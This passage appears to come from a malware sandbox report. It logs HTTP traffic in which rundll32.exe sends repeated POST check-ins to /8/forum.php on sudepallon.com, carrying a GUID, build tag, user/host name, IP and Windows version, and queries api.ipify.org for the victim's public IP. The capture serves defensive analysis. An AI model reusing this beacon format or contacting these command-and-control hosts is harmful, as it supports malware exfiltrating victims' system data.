                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:47.067230940 CEST709INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:48 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMCXNARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              28192.168.2.34974877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:47.939001083 CEST710OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:48.010452032 CEST711INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:49 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 51 4a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFQJUARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              29192.168.2.34974977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:48.825881004 CEST711OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:48.894567966 CEST712INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:50 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCZAXARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              3192.168.2.34972277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:17.981962919 CEST666OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:18.053314924 CEST666INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:19 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKAZPARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              30192.168.2.34975077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:49.831450939 CEST713OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:49.898061991 CEST713INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:51 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 59 42 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHYBSARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              31192.168.2.34975177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:50.674189091 CEST720OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:50.741527081 CEST720INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJGTQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              32192.168.2.34975277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:51.066761017 CEST721OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:51.137720108 CEST721INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 4e 4d 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKNMPARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              33192.168.2.34975477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:51.482800961 CEST728OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:51.552678108 CEST731INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:53 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQYBJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              34192.168.2.34975577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:51.864201069 CEST737OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:51.933939934 CEST738INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:53 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCAZXARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              35192.168.2.34975623.21.173.15580C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:51.971111059 CEST738OUTGET / HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: api.ipify.org
                              Cache-Control: no-cache
                              Jul 9, 2021 03:11:52.079622030 CEST757INHTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              36192.168.2.34975877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:52.373225927 CEST991OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:52.443495035 CEST1241INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZTGAARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              37192.168.2.34975923.21.224.4980C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:52.579963923 CEST1754OUTGET / HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: api.ipify.org
                              Cache-Control: no-cache
                              Jul 9, 2021 03:11:52.685327053 CEST2500INHTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              38192.168.2.34976077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:52.665235043 CEST2500OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:52.735276937 CEST2562INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQCXJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              39192.168.2.34976277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:52.813720942 CEST2683OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:52.878868103 CEST2689INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHZASARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              4192.168.2.34972323.21.173.15580C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:18.656306028 CEST667OUTGET /?format=xml HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                              Host: api.ipify.org
                              Connection: Keep-Alive
                              Jul 9, 2021 03:11:18.807811022 CEST667INHTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:18 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              40192.168.2.34976377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:52.867273092 CEST2689OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:52.933099985 CEST3184INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKZAPARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              41192.168.2.34976677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:53.121356964 CEST3353OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.188827038 CEST3354INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 46 55 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMFUNARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              42192.168.2.34976777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:53.238991022 CEST3379OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.305377007 CEST3384INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKTGPARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              43192.168.2.34976877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:53.302689075 CEST3383OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.368937969 CEST3384INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQCXJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              44192.168.2.34977177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:53.507857084 CEST3396OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
